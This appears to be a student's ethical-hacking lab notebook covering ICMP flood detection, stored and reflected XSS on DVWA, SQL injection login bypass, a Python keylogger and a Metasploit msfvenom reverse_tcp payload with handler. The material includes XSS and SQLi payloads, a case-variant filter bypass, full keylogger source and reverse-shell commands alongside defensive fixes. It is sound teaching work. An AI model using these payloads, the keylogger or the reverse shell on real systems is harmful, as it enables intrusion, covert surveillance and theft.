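    """Ethernet + IPv4 + ICMP Echo Request with both checksums filled in."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload          # type 8 = echo request
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), ident, 0,
                     64, 1, 0, ip_bytes(src_ip), ip_bytes(dst_ip))        # protocol 1 = ICMP
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    eth = bytes.fromhex("aabbccddeeff") + bytes.fromhex("001122334455") + b"\x08\x00"
    return eth + ip + icmp

def dissect(frame: bytes) -> Optional[Dict]:
    """Ethernet -> IPv4 -> ICMP, returning the fields Wireshark's detail pane shows."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None                                    # not IPv4
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    proto = ip[9]
    rec = {"src": ip_str(ip[12:16]), "dst": ip_str(ip[16:20]), "proto": proto,
           "ip_checksum_ok": inet_checksum(ip[:ihl]) == 0}
    if proto == 1:
        icmp = ip[ihl:struct.unpack("!H", ip[2:4])[0]]
        typ, code, _, ident, seq = struct.unpack("!BBHHH", icmp[:8])
        rec.update(icmp_type=typ, code=code, id=ident, seq=seq,
                   payload_len=len(icmp) - 8, icmp_checksum_ok=inet_checksum(icmp) == 0)
    return rec

def echo_request_sources(frames_with_time: List[Tuple[float, bytes]],
                         window: float = 1.0, threshold: int = 50) -> List[str]:
    """Sources sending more than `threshold` Echo Requests within any `window` seconds."""
    times = defaultdict(list)
    for ts, frame in frames_with_time:
        rec = dissect(frame)
        if rec and rec.get("icmp_type") == 8:
            times[rec["src"]].append(ts)
    flagged = []
    for src, ts_list in times.items():
        ts_list.sort()
        start = 0
        for end, t in enumerate(ts_list):              # sliding window over timestamps
            while t - ts_list[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged.append(src)
                break
    return flagged

def lab_capture() -> List[Tuple[float, bytes]]:
    """Constructed capture: one normal ping per second from a workstation and a
    flood from the attacking host, both aimed at the target of the exercise."""
    normal = [(float(i), build_echo_frame("192.168.1.10", "10.128.131.108", 1, i)) for i in range(4)]
    flood = [(0.5 + i * 0.002, build_echo_frame("10.128.131.5", "10.128.131.108", 2, i, b"\x00" * 1400))
             for i in range(300)]
    return normal + flood

if __name__ == "__main__":
    cap = lab_capture()
    print(dissect(cap[0][1]))
    print("flooding sources:", echo_request_sources(cap))
```

In a real capture the same rate check is what Wireshark's Statistics >> Conversations view gives you by hand, and what an IDS rule keyed on ICMP echo rate per source automates.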
Practical No.: 06 Roll No.: 336
Topic: Simulate persistent cross-site scripting attack

Aim: Simulate persistent cross-site scripting attack


Steps:

Step 1: Open XAMPP and start Apache and MySQL (DVWA must already be unpacked into htdocs).

Step 2: Go to http://localhost:8080/setup.php, click Create / Reset Database, then log in with username admin and password password (DVWA's defaults).

Step 3: The DVWA home page opens.

Step 4: Once logged in, navigate to the DVWA Security tab, select "Low" in the drop-down box and hit Submit, so that the application applies no input filtering or output encoding.

Step 5: Stored (persistent) cross-site scripting: open XSS (Stored), enter a name and, as the message, a script tag such as <script>alert(document.cookie)</script>, then click Sign Guestbook. The entry is saved in the database, so the script runs in the browser of every later visitor to the page, not only for the one who submitted it; that persistence is what distinguishes stored from reflected XSS.

Step 6: Reflected cross-site scripting: open XSS (Reflected) and submit the same payload in the name field. It is echoed back and executes only in the response to that one request, so an attacker has to deliver it to a victim in a crafted link.


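The difference between Steps 5 and 6 and the actual fix, as an added example that is not part of the original practical and not DVWA's code: a tiny guestbook that stores entries and renders them three ways, copied in as-is (DVWA Low), with the literal "<script>" string stripped (a DVWA Medium-style blocklist), and HTML-encoded. The payloads are the standard lab strings; nothing here targets a real site.

```python
# Added example, not from the original practical or from DVWA: a tiny guestbook
# that reproduces three behaviours, Low (echo as-is), a Medium-style blocklist
# (strip the literal "<script>") and output encoding, so the difference between
# persistence, filtering and encoding is visible. Payloads are the standard lab
# strings, not anything from a real site.
import html
from typing import List, Tuple

PAYLOAD = "<script>alert(document.cookie)</script>"
BYPASS = "<ScRiPt>alert(document.cookie)</ScRiPt>"   # defeats a case-sensitive blocklist

class GuestBook:
    def __init__(self) -> None:
        self.entries: List[Tuple[str, str]] = []      # the "database" rows

    def sign(self, name: str, message: str) -> None:
        self.entries.append((name, message))          # stored: every later view gets it

    def render_low(self) -> str:
        """DVWA Low: user input copied straight into the HTML."""
        return "".join(f"<div>Name: {n}<br />Message: {m}</div>" for n, m in self.entries)

    def render_medium(self) -> str:
        """Blocklist in the style of DVWA Medium: removes the exact string '<script>'."""
        return "".join(f"<div>Name: {n}<br />Message: {m.replace('<script>', '')}</div>"
                       for n, m in self.entries)

    def render_encoded(self) -> str:
        """The actual fix: HTML-encode untrusted data for the HTML-body context."""
        return "".join(f"<div>Name: {html.escape(n)}<br />Message: {html.escape(m)}</div>"
                       for n, m in self.entries)

def executes_script(page: str) -> bool:
    """Crude stand-in for the browser: does a script tag survive unencoded?"""
    return "<script" in page.lower()

if __name__ == "__main__":
    book = GuestBook()
    book.sign("attacker", PAYLOAD)
    book.sign("attacker", BYPASS)
    book.sign("visitor", "nice site")
    for view in ("render_low", "render_medium", "render_encoded"):
        page = getattr(book, view)()
        print(f"{view:15s} executes script: {executes_script(page)}")
```

Encoding is the fix because it is complete for its context: every character that could start markup is neutralised, so there is no variant to search for. A blocklist has to enumerate variants (case, <img onerror=...>, event handlers) and always misses one, which is exactly what the BYPASS string demonstrates.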
Practical No.: 08 Roll No.: 336
Topic: Perform SQL injection attack.

Aim: Perform SQL injection attack.


Steps:

Step 1: Open a browser, go to https://www.hacksplaining.com/exercises/sql-injection and click on SQL injection.

Step 2: Try to log in with email user@email.com and password password. The login fails, as expected.

Step 3: Try again with email user@email.com and password password' (with a trailing single quote). The site shows a database error: the quote closed the string literal inside the login query and left an unbalanced quote behind, which proves the input is concatenated into the SQL text unescaped.

Step 4: Use that error to our advantage. Enter email user@email.com and password password' or 1=1--
The query becomes ... AND password = 'password' or 1=1--' : the OR makes the WHERE clause true for every row and -- comments out what follows.

Step 5: Hit Enter. You are logged into the bank account without the correct password. The fix on the server side is a parameterized query, so that user input is passed as a value and never parsed as SQL.
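The three inputs from Steps 2 to 4 against the login query rebuilt locally, as an added example that is not part of the original practical and not hacksplaining's code: an in-memory SQLite table with one constructed account, a login built by string concatenation (which reproduces the error from Step 3 and the bypass from Step 4) and the parameterized version that resists both.

```python
# Added example, not from the original practical or from hacksplaining: the
# login query behind the exercise rebuilt on an in-memory SQLite table, once
# with string concatenation (what the site's error message reveals) and once
# parameterized. The account row is constructed; nothing here touches a real site.
import sqlite3
from typing import Optional, Tuple

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, balance INTEGER)")
    conn.execute("INSERT INTO users VALUES ('user@email.com', 's3cret!', 1250)")  # constructed
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """Input pasted into the SQL text. Returns the matched row, None, or ('ERROR', msg)."""
    sql = (f"SELECT email, balance FROM users "
           f"WHERE email = '{email}' AND password = '{password}'")
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:       # the "database error" seen in Step 3
        return ("ERROR", str(exc))

def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[Tuple[str, int]]:
    """Parameterized query: the driver sends values separately, so they are never parsed as SQL."""
    return conn.execute("SELECT email, balance FROM users WHERE email = ? AND password = ?",
                        (email, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    for pw in ["password", "password'", "password' or 1=1--"]:
        print(f"vulnerable {pw!r:25}:", login_vulnerable(db, "user@email.com", pw))
        print(f"safe       {pw!r:25}:", login_safe(db, "user@email.com", pw))
```

Note that the parameterized login returns no error for the trailing-quote input either: the quote is just a character in the value, so the attacker loses the error message that told them injection was possible in the first place.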
Practical No.: 09 Roll No.: 336
Topic: Create a simple keylogger using python

Aim: Create a simple keylogger using python.


Steps:

Step 1: Install the pynput library (run pip install pynput in cmd), save the following code as keylogger.py and run it with python keylogger.py.

Code:

    # Install pynput first: pip install pynput
    import logging
    from pynput.keyboard import Key, Listener

    # Empty string means the log file is written in the current directory
    log_dir = ""

    # Every key press is appended to key_log.txt with a timestamp
    logging.basicConfig(filename=log_dir + "key_log.txt",
                        level=logging.DEBUG,
                        format="%(asctime)s:%(message)s:")

    # Callback that pynput invokes for every key press
    def on_press(key):
        logging.info(str(key))
        if key == Key.esc:          # press Esc to stop the listener
            return False

    # Start the keyboard listener and block until it stops
    with Listener(on_press=on_press) as listener:
        listener.join()

Step 2: Open Notepad and type something. A key_log.txt file is created in the same directory and records every keystroke; press Esc to stop the logger. A process hooking all keyboard input like this is exactly the behaviour endpoint protection looks for, so run it only on your own machine.
Practical No.: 10 Roll No.: 336
Topic: Using Metasploit to exploit (Kali Linux).

Aim: Using Metasploit to exploit (Kali Linux).


Steps:

Step 1:
- Download and install VirtualBox.
- Download and install the Kali Linux distribution; this is the attacking machine.
- Download and install Metasploitable, an intentionally vulnerable Linux VM that will be one target machine.
- Download and install Windows XP, which will be the other target machine. Put all the VMs on the same host-only or internal network so that lab traffic never leaves your computer.

Step 2:
- Open the Metasploit console in Kali by following the path Applications → Exploitation Tools → Metasploit, or by typing msfconsole in a terminal.
- The banner that appears shows the version of Metasploit (highlighted with a red underline in the screenshot).

Step 3: If Metasploit is missing or outdated, use the following commands to install or update it. After running them you will have to wait several minutes until the update completes.

apt update
apt install metasploit-framework

Step 4: Create the payload on the Kali command line with msfvenom. LHOST is Kali's address on the lab network and LPORT the port the handler will listen on:

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.159 LPORT=4444 -f exe -a x86 > Hack.exe

After successfully creating the payload Hack.exe, copy it to the victim PC (Windows XP). Any current anti-virus flags an unencoded msfvenom executable; that is expected in this lab.

Step 5: Start the handler that will receive the connection. Open Metasploit:

root@kali:~# msfconsole

Step 6: Configure exploit/multi/handler with the same payload, LHOST and LPORT that were used in msfvenom. The payload name must match the one compiled into Hack.exe, windows/meterpreter/reverse_tcp, not an Android payload:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.159
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > exploit

Step 7: There is no remote host to set. A reverse_tcp payload connects from the victim back to LHOST:LPORT, so multi/handler has no RHOST/RPORT options; the "target" is whichever machine runs Hack.exe. (The original notes set rhost 192.168.43.99 and rport 80 at this point; those options do not apply to this module.) This outbound direction is what lets the session through a firewall that blocks inbound connections to the victim.

Step 8: Run Hack.exe on the Windows XP VM. The handler prints "Meterpreter session 1 opened" and drops to a meterpreter > prompt.

Step 9: In the session, type screenshot. Meterpreter captures the victim PC's desktop and saves it as an image in the current directory on Kali (the root home directory here).

Capture output
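The direction described in Step 7 is easier to see with plain sockets. The following is an added example, not part of the original practical and not Metasploit's code: a listener that plays the role of multi/handler (it binds LHOST:LPORT and waits, needing no target address) and an "implant" that plays the role of the reverse_tcp stub inside Hack.exe (it connects outbound, checks in and answers one command). The implant only sends a constructed check-in string; hostnames and the command are placeholders.

```python
# Added example, not from the original practical or from Metasploit: the
# reverse-TCP direction multi/handler relies on, reduced to sockets so the
# LHOST/LPORT vs RHOST confusion in the notes is concrete. The "implant" only
# sends a check-in string and answers one command; hostnames are constructed.
import socket
import threading
from typing import Dict, Tuple

def start_handler(lhost: str = "127.0.0.1", lport: int = 0) -> Tuple[int, threading.Thread, Dict]:
    """Handler side (what exploit/multi/handler does): listen on LHOST:LPORT and wait.
    It needs no target address; the victim initiates. lport=0 picks a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((lhost, lport))
    srv.listen(1)
    session: Dict = {}

    def serve() -> None:
        conn, peer = srv.accept()                      # "Meterpreter session opened"
        with conn:
            session["peer"] = peer[0]
            session["checkin"] = conn.recv(1024).decode()
            conn.sendall(b"sysinfo\n")                 # the handler drives the session
            session["sysinfo"] = conn.recv(1024).decode()
        srv.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread, session

def run_implant(lhost: str, lport: int, hostname: str = "LAB-WINXP") -> None:
    """Payload side (what reverse_tcp inside Hack.exe does): connect OUT to LHOST:LPORT.
    Outbound connections pass firewalls that block everything inbound to the victim."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        s.sendall(f"checkin {hostname}".encode())
        command = s.recv(1024).decode().strip()
        if command == "sysinfo":
            s.sendall(f"Computer: {hostname}  OS: Windows XP (simulated)".encode())

def demo() -> Dict:
    port, thread, session = start_handler()           # Kali side
    run_implant("127.0.0.1", port)                    # victim side, in the same process here
    thread.join(5)
    return session

if __name__ == "__main__":
    print(demo())
```

On the defensive side this is also why the netstat check from Practical 3 matters: the only trace of the implant on the victim is an ESTABLISHED outbound session to LHOST:LPORT, owned by a process that should not be making one.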
